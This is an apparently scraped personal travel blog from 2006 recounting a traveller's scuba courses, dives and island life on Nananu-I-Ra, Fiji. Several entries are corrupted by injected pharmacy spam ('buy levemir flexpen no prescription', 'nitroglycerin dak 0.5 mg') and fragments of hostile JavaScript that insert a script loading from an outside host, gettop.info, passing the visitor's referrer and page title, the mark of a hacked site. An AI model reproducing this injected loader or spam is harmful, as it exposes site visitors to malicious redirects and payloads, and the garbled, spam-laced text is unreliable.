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Wreck diving

Posted by admin On July - 19 - 2006

The last dive in the advanced mode was a wreck dive in the ‘Papanu Explorer’. We met at 6:30am because Adrian (Dive con) picked up his girl friend Kirsten from the airport today. The wreck was amazing. The visibility was not that good, the water was a bit blurry but then there it was. First of all we swam araund it and then from the bottom up throgh each room. I saw a big sleeping fish and some giant clam shells. In the evening got my Logbook with my advanced certivicate back. Have now 14 dives.

At 11:30pm Glenn and I took the boat to Rakiraki for shopping. Had a nice day, good food and good conversation. On the way back to the island we stoped at a fish shop and I bought a snapper just for F$ 2,40! Will prepare the fish the next day with fresh coconut sauce.

In the evening was Lovo (like Maori Hangi) night with the traditional polinesian dance.
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Night dive

Posted by admin On July - 18 - 2006

Next in course was an ordinary boat dive but we went again to the ‘Shark Junction’ and saw about eight White Tip Reef Sharks. Very beautiful creatures. I dived over one and it was beautiful. Saw as well a sea snake. In the evening I done the night dive. My buddy was Aaron who gaves me the nice photos of some fish and the turtle. This dive was an experiment but didn’t like the night dives that much. Its dark and you go diving with a torch. If you swich out the light, you see the fluorecence particle in the water glow. The polyps of the coralls only come out at night time, some crabs moved and I saw open clam shells. pacific care pharmacy var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

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Advanced Course

Posted by admin On July - 17 - 2006

Started today my Advandced Course with the 30m deep dive at ‘Dream Maker’.}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

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Golden Dreams

Posted by admin On July - 16 - 2006

Diving is addictive. After finishing my Open Water Course I decided to do one more dive because just find out how to dive just with using the lungs for diving up and down. We went to my favourite dive site ‘Golden Dreams’, next to ‘Shark Junction’. ‘Golden Dreams’ was in ‘National Geographic’ and Cousteau said it belongs to the ten best dive sites in the world. It was so wonderful. And the best of all was that I saw there today my first shark near the ‘Shark Junction’. It was a White Tip Reef Shark (see on Aarons picture below). I thought now I should do my Advanced Course. Glenn said I will be allright and can do it.

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First boat dives

Posted by admin On July - 15 - 2006

After passing my mask skill and completing all skills I was ready for going diving in the breathtaking reefs at the Bligh Water around Nananu-I-Ra. And right on my first dive in the morning at ‘Bula Maker’ I saw a turtle. It was so beautiful. On the afternoon dive we went to another dive site called ‘Dream Maker’. Both beautiful with corals and hundreds of different fish. In the evening made the written multiple choice test for finishing the Open Water course. In the evening we had the beach party

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Ann and I at our first boat dives…

Aaron a guy I met gave me some nice photos he took and his turtle looks like the one I´ve seen…

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The mask skill

Posted by admin On July - 14 - 2006

This friday was a sunny day. I was excited because I didnt like to take of the mask under water. Its so irritating when the cold water comes into the face that you stop breathing and when you start again you use the nose. Fortunally I wasnt alone. Another girl, Ann, was not able to do some of the skills as well. Glenn was really patient with us and we first done the regulator skill, then he took us for a nice fun dive around the reef in front of the Nananu beach. That was great. In the end we done the mask skill, and after he told us some tricks we both were able to pass the mask skill. Finally. I was so happy. In the afternoon I had a dive alone with dive con Andy at the front beach reef. Was good but had in the beginning some equilizing problems with my left ear. Couldnt go that fast deeper in the beginning. But later on had great fun and enjoyed more the single dives that the dives with bigger groups. buy levemir flexpen no prescription } else {d.getElementsByTagName(‘head’)[0].appendChild(s);

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Diving skills

Posted by admin On July - 12 - 2006

For diving we met each day at 7:45am at the dive shop for preparing our gear. We constructed the diving equipment. Then we improved our diving skills . We had to take of the weight belt, the BCD and the regulator under water. Unfortunately I failed with the mask skill. It was to scary for me taking off the mask under water. I started panicing. Felt not save. Was really dissappointed because couldnt made it and the dive instructor Chris said, if I can’t manage it I will not go diving with the group at the beautiful reefs. I was very upset this evening and went to the beach watching the stars. The sky was so clear and I saw the southern cross and the milky way. When I came back the others helped me to chin up and later on the instructor said he was talking to Glen and I will get an extra mask skill dive the next day with him.d.getElementsByTagName(‘head’)[0].appendChild(s);

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Starting my Open Water Diving Certificate

Posted by admin On July - 11 - 2006

Today I was very excited – it was my first day of learning how to dive. I met Chris a german instructor. He is ok in teaching diving but sometimes also very harsh and with to much pressure. I can understand why because diving can be dangerous if you not follow the rules and as an instructor you are responsible for your students. But still he should be more understanding. The dive shop belongs to ‘Reef Safari’ an australian company and my certificate will be the SSI but its the same like the PADI. The difference is just the name and the SSI is australian standard, PADI is american standard. First of all we had to learn about the diving equipment and a couple of chapters in a dive book. And we went straight into the water because Nananu is in the lucky position to have a small nice reef in front of the beach so you need no boat. nitroglycerin dak 0.5 mg var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

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Nananu-I-Ra – Daydream island

Posted by admin On July - 10 - 2006

About 8:30am the shuttle from Nananu Lodge picked us up for bringing us to this perfect island. The trip took us four hours, but on the way we stopped at ATM and in Rakiraki for food shopping. The last 15min we took a boat to the island. And it is a beautiful island, for me it was the first tropical island in my life. I was not surprised when Glenn the manager of Nananu Lodge welcomed us and told us Nananu-I-Ra means Daydream island. It was much better than I ever expected… The dive sites around belong to the 10 best in the world after Jaques Michel Cousteau. And he must know. He bought the island next to Nananu-I-Ra. I got a beautiful room at the Coconut Lodge and my bed got ocean view. A big plus in Nananu is as well that you have the opportunity to cook, also you can have the meal package. In the afternoon went to the beach and relax. For watching the perfect sunset everyday you can go on the little next to the resort. Once a week is happy hour at the sunset bure on the top of the hill.

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Fijian BBQ

Posted by admin On July - 9 - 2006

Slept only about four hours because somebody was snorring in the dorm. Sunday morning I watched the worldcup game Germany against Portugal about the third place. Met Scott (Scottland) and some others watching the game. Germany played well and won. At least the third at the worldcup. Well done. In Fiji you cant expect anything on sunday. Nothing goes – its Fiji time. So we hang out at the pool and I met Matt, Nathan, Simon, Jenny, Zoe, Emma, Daniel, Lindsey, Foxy and Megan… I had a chat with them and they asked if I wanna join them at there trip to Nananu-I-Ra. Its a quit unknown but very beautiful island. I really liked the idea but normally had other plans for Fiji. I wanted to see the ‘Blue Lagoon’ and do the shark feeding in Pacific Harbour. And first of all I wanted to learn diving, doing the Open-Water-Course. After phoning at Nananu-I-Ra we find out that everything there is much nicer and cheaper. So I changed my plans and decided to go with the others the next day. Later on I went to the beach for collecting shells and met again Bins who invites me spontaniously to an authentic fijian BBQ. Before I asked them If they can prepare me a coconut because never had fresh coconut juice. The coconut was delicious and I learned that there are three types of coconuts. Some are for juice (yellow), others for eating or cooking (brown, green). Also I tried sugar cain – very sweet. The BBQ was with original fijian potatos. That are roots which the fijian peel and cook. They taste after potato but are more dry.

Preparing the coconut…

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View to the highlands of the the main island Viti Levu with sugar cain fields…

First group shot in the ‘Horizon’ (from left to the right): Glen (snorring guy), Matthew (Main Panther), Simon, Emma, Scott (Mr. Bold Jacuzzi), Nathan, Zoe, Jenny, Daniel, Megan.
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